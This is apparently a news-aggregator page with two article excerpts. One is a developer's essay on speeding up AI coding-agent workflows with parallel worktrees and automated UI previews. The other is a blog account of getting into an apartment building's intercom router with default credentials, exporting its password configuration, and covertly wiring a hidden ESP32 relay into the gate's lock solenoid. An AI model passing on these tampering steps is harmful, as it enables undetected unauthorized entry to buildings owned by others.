It sounds like a small change. It wasn’t. Sub-second restarts mean you never leave the flow. Save a file, the server’s already up, check the preview. There’s no gap where your attention drifts. It’s the difference between a conversation with awkward pauses and one that flows naturally.
Before this, I checked every UI change. Preview locally, eyeball it, decide if it matches what I expected. It worked, but it meant I was a bottleneck on every feature.
After the Chrome extension kept crashing, I switched to the preview feature in Claude Code. It lets the agent set up a preview, persist session data, and see how the UI actually looks.
I wired it into the workflow: a change isn’t “done” until the agent has verified the UI itself. That meant I could delegate verification and only step in for final review — which also meant agents could run much longer without oversight. They’d catch their own mistakes. That mattered more than I realized at the time.
Fast rebuilds and automated previews made another friction visible: I could only comfortably work on one thing at a time.
I was reviewing PRs from other agents and teammates. The workflow was painful: check out the PR branch on main, rebuild, test. But that would mess with my uncommitted changes. So I’d stash, checkout, rebuild, test, switch back, pop the stash. Or create a worktree manually, set it up, try to run the preview - only to find the ports clashing with my other running server.
Our app has a frontend and a backend, each needing its own port. Every worktree shared the same environment variables, so they’d all try to bind to the same ports. Running two things at once was a fight.
I built a system around this. Whenever a worktree is created, every server gets assigned ports from a unique range. No collisions. I could run ten previews simultaneously if I wanted.
I went from getting overwhelmed by two parallel branches to running five worktrees at once. My create loop changed: fire off multiple agents on separate worktrees, each building a different feature. They’d only stop once they’d verified the UI themselves.
I’d be heavily involved in planning. Then I’d disappear until code review. Agents catching their own mistakes mattered a lot more with five running at once.
Reviewing got smoother too. No faffing around with setup. No rebuilding. No port conflicts. Just: read, verify, merge. Next.
My role has changed. I used to derive joy from figuring out a complicated problem, spending hours crafting the perfect UI. I still do that sometimes, but a lot less now. What’s become more fun is building the infrastructure that makes the agents effective. Being a manager of a team of ten versus being a solo dev. And like any good manager, you get to claim credit for all the work your “team” does.
These aren’t glamorous problems. They’re plumbing. But plumbing determines whether you’re in flow or wrestling your environment.
The highest-leverage work I’ve done at Tano hasn’t been writing features. It’s been building the infrastructure that turned a trickle of commits into a flood.
Each of these stages removed a different kind of friction:
/git-pr removed the friction of formatting - turning code changes into a presentable PR.
SWC removed the friction of waiting - the dead time between making a change and seeing it.
The preview removed the friction of verifying changes - I could quickly see what’s happening.
The worktree system removed the friction of context-switching - juggling multiple streams of work without them colliding.
And each time I removed one, the next became visible. When PRs were effortless, I noticed I was wasting time on rebuilds. When rebuilds were instant, I noticed I couldn’t run things in parallel. Classic theory of constraints — fix one, and the system immediately shows you the next one.
The nature of the work changed. I’m not “using a tool that writes code.” I’m in a tight loop: kick off a task, the agent writes code, I check the preview, read the diff, give feedback or merge, kick off the next task. The feedback loop is so tight that there’s no gap for my attention to leak out.
Building things is a different kind of fun now — it’s so fast that the game becomes improving the speed. How much faster can I go? When the loop is tight enough, engineering becomes the entertainment.
...
Read the original on neilkakkar.com »
My friend Frank (not his real name) hosts a lot of guests at his apartment, and his complex’s intercom is what ushers them inside. You’ve probably seen them before, they look like this:
Up until recently, guests could find Frank’s number in the system and give it a call. If Frank recognized the people on the line, he would press a number on his dial pad, which the controller would interpret as a signal to unlock the gate.
Then, management got lazy. The complex Frank lives in failed to renew their intercom’s cellular service, so it could no longer make calls for the voice system. Even after months of asking his landlord to fix it, nothing was done.
My other friend Hazel and I arrived to visit Frank during this outage period, and he asked us to see what we could do. Here’s what we saw:
We inspected the top box closer, giving a promising result: it was unlocked! The general layout of the box is as follows:
It was impossible to ignore the massive Wi-Fi/cell router in the top corner with its admin password printed right on it (not pictured). Of course, I had to investigate.
I quickly found the network and entered the login credentials shown. Of course, they weren’t changed from the defaults. I had full admin access to the router, which was awesome, until I realized that I couldn’t do very much with its basic, locked-down interface. This almost ended my exploration, but then I realized: what about SSH?
AT&T, the company that makes the routers for Doorking, is smarter than a bag of rocks in that SSH is protected on their router. Sadly for them, they lose to the bag of rocks in providing a way to download their entire system configuration from the web interface, containing a way to reset the root password to whatever you want:
# This file is an exported configuration from NetComm Bovine platform based device.
# Private fields are encrypted but any configuraiton entry can be manually replaced by
# a plain-text variable or URI-encoded text.
admin.firewall.enable;1
admin.local.enable_http;1
admin.local.enable_https;1
admin.local.ssh_enable;1
admin.local.telnetenable;1
admin.open.port;
admin.password;
admin.user.admin;$aM9VdmCoc5vuekVU70/Gl8iJTOujxMQo
admin.user.root;$DDDgp0GJy6nB29UX7pDlrUUKDkWYqp84
Wow. I now see why router vulnerabilities are so common.
This was certainly a promising avenue, but we realized something: even if we gained code execution on the router, we would have to figure out its custom serial protocol to even have a chance at talking to the main control box. This wasn’t something Hazel and I wanted to spend our entire vacation doing, so we decided to look elsewhere.
Looking at the other terminals within the box, we saw the PH LINE phone connectors for each system. This was promising, since Frank’s existing intercom system used DTMF signals to open the gate back when it was working.
However, it was unlikely that the main control box would blindly accept any phone commands while not actively listening for them after a user had asked it to. It would’ve been possible to test this hypothesis, but we were again left with the reality of extremely limited debugging capabilities, in addition to minimal knowledge of phone signaling systems.
Hazel and I knew there had to be some vulnerability in the system that would allow us to inject our own commands into the gate control system. We were correct, but we first needed a change in perspective. Our initial assumption was that we needed to take top-down control over the system to make it do what we wanted. After our previous failures to do so, we changed our goal to take bottom-up control of the system: undermining it at its core.
We expanded our search past the voice box to the main junction box that routed the wires between the voice box and the (inaccessible) main controller. After unscrewing two flathead screws, we were met with an interesting surprise: an extra cable we didn’t expect. Tracing the cable led to a revelation: the main control box controls the solenoid, the mechanical device responsible for unlocking the gate, through the junction box!
Having access to the solenoid control wire changed our approach dramatically. Solenoids are just electromagnets that have two states: unpowered (locked) and powered (unlocked); no security measures, no protocols to snoop. With this easy access point, we could just apply our own power to the solenoid to unlock the gate. In addition, the 12 volt DC auxiliary power from a terminal in the voice box would be perfect to power a microcontroller.
Here is the plan we came up with:
* Split the wire that runs to the lock housing and triggers the solenoid. Connect the split end to a Wi-Fi-enabled ESP32 relay board.
* Write firmware in Rust to turn the ESP32 into a Matter client that we can connect to Frank’s Apple Home.
* Hide the board inside the little junction box, conveniently placed there by the building for maximum discreetness.
* Power the board by plugging a power cable into the Doorking voice box and running the cable into the junction.
It was time to order parts. Thankfully Hazel found an ESP32 relay board that did exactly what we wanted, having two relays to control the solenoid. The circuit ended up looking like this:
This setup ensures that if our circuit were to fail, the system would still remain fully functional since the gate control commands are passed through when no power is applied to the relay.1
Once we had the hardware set, next up was the software. We chose to use a Matter library written in Rust with specializations for the ESP32. This would allow us to use an open standard (with freely accessible specs, no filetype:pdf digging necessary!) to connect to Frank’s Apple Home setup.
The software can be described by this state machine:
It’s pretty simple. Startup and connect to the network. Once connected, start listening for commands from the home. When instructed, unlock the gate for a certain amount of time (user configurable with a default time of ten seconds), then re-lock the gate. Importantly, the software will never let the gate stay unlocked indefinitely, ensuring the system remains secure. You can look at the code yourself here.
One particularly infuriating issue we encountered during development was the ESP32’s very limited RAM space. Launching both the Wi-Fi and Bluetooth stacks together would almost always cause memory corruption due to overallocation, leading to a hard reset after invalid memory access. The Matter implementation we used utilized the ESP32’s older Bluedroid Bluetooth stack instead of the newer NimBLE, making the problem even worse. After manually tweaking the size of the stack for a long time, even with the help of Claude Code we were unable to get it stable. However, there was a solution in store: only enable either Wi-Fi or Bluetooth, and have Claude dump a bunch of memory-saving config settings into sdkconfig.defaults. Bluetooth is only necessary for the provisioning process, and Wi-Fi is only necessary for regular operation. There is a small window during the provisioning process where both need to be active, but this is short enough to not cause problems. Now, in normal operation the ESP32 immediately disables Bluetooth, eliminating the problem.
Once we handled all of the edge cases, the device showed up in Apple Home!
Fun fact, you can set the manufacturer information to whatever you’d like:
Once we had the software running perfectly, we moved on to deploying the device. Luckily, the board we bought fit perfectly into the small junction box that started us down this path, so it would be completely invisible to anyone who passed by. Hazel had already run power lines from the voice box to the junction box, and we had already purchased a Wi-Fi extender to ensure the signal was strong, so all we needed to do is hook things in. After a lot of careful splicing by Hazel, it was installed! We connected power in the voice box, aaaaannnnnndddddd… nothing. No power.
This was bad. Something had bucked our expectations, but we had no idea what. Frank didn’t have a multimeter, so we were stuck trying to figure out if there was a fray in the power wire, or if there was maybe a blown component on our board, or any number of other potential problems. Eventually I got an idea: Frank owns a cordless drill. After rummaging around in his tool closet, I found what I was looking for: a cordless drill battery, rated to output 20 volts. I ran downstairs, connected it to the power wires, and eureka! It worked! The board fired up and connected to Apple Home. This was a wild feeling, being able to unlock the gate before I even got to it.
While it felt really good to know that the project could work, we needed to figure out what was going on with the power. After some digging I came across the service manual for the voice box, and I found something that should’ve been obvious: the 12 volt aux port was an input, not an output, for power sources such as solar panels. It was frustrating for us to discover this fact, but at least our board was functional. After a quick search I ordered a rectifying regulator that converts the 18 volt AC input to 12 volts DC. Shipping took forever, but once it arrived it fit right in alongside the ESP32 board inside the junction box. I connected it to the known-working AC power for the voice box, and power started flowing! We closed everything up, and we were done.
Hazel and I are super proud of our little box of secrets, and Frank couldn’t be happier. With his newfound capability to unlock the gate through Apple Home,
* Frank can unlock the building gate for himself with an easy tap on his phone, or remotely let guests in again without the intercom.
* Frank’s Home guests can now unlock both the building gate and his apartment’s smart lock from the Home app; it’s now an all-in-one way for them to easily enter his apartment.
As a bonus, the assembly is very discreet: it’s just one ESP32 and a small power device hidden in a screw-secured junction box that doesn’t interfere with the building’s primary access control system, giving it a much better chance of avoiding discovery.
This was such a fun project to work on, and it allowed me to dip my toes into circuit hacking, something I don’t get to do nearly enough. The components for this project are all super simple, so if you’re in the same position as Frank, give it a try! Tag me on Twitter if you get it working!
...
Read the original on jackhogan.me »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.